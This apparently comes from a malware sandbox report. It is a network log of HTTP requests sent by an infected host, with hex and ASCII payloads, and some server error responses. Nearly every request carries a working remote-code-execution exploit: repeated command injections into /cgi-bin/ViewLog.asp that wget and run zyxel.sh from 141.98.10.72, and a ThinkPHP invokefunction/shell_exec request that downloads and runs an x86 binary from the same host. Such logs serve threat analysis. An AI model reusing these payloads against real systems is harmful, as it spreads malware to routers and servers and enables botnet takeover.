                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            27192.168.2.2338712112.74.74.6080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.323820114 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            28192.168.2.233944494.177.162.2458080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.561089993 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:53.784900904 CET460INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 08:27:52 GMT
                                                            Server: Apache/2.4.43 (Win64) mod_fcgid/2.3.10-dev OpenSSL/1.1.1f
                                                            Content-Length: 196
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            29192.168.2.235616895.171.194.198080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.568450928 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:53.800146103 CET154INHTTP/1.1 401 Unauthorized
                                                            Content-Length: 0
                                                            WWW-Authenticate: Basic realm="XBMC"
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 08:27:53 GMT


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            30192.168.2.233661894.121.128.2288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.585530996 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            31192.168.2.235073094.121.188.808080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.587305069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            32192.168.2.234959095.0.51.218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.589194059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:53.840408087 CET314INPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            33192.168.2.233286085.243.82.748080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.609810114 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:53.885823011 CET476INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 08:27:52 GMT
                                                            Server: Webs
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1;mode=block
                                                            Cache-Control: no-store
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            34192.168.2.235983231.136.244.2298080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.771848917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:54.404195070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:55.683980942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:58.403589010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:03.522871017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:13.761485100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:35.006494045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:15.960747004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            35192.168.2.234812694.120.52.778080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.833235979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            36192.168.2.233639294.123.6.1808080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.833564997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            37192.168.2.235414031.136.247.1338080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.976996899 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:54.596189022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:55.843995094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:58.403601885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:03.522874117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:13.505575895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:35.006500006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:15.960745096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            38192.168.2.236099894.143.43.1798080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:54.043113947 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:54.286494017 CET548INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:27:52 GMT
                                                            Server:
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
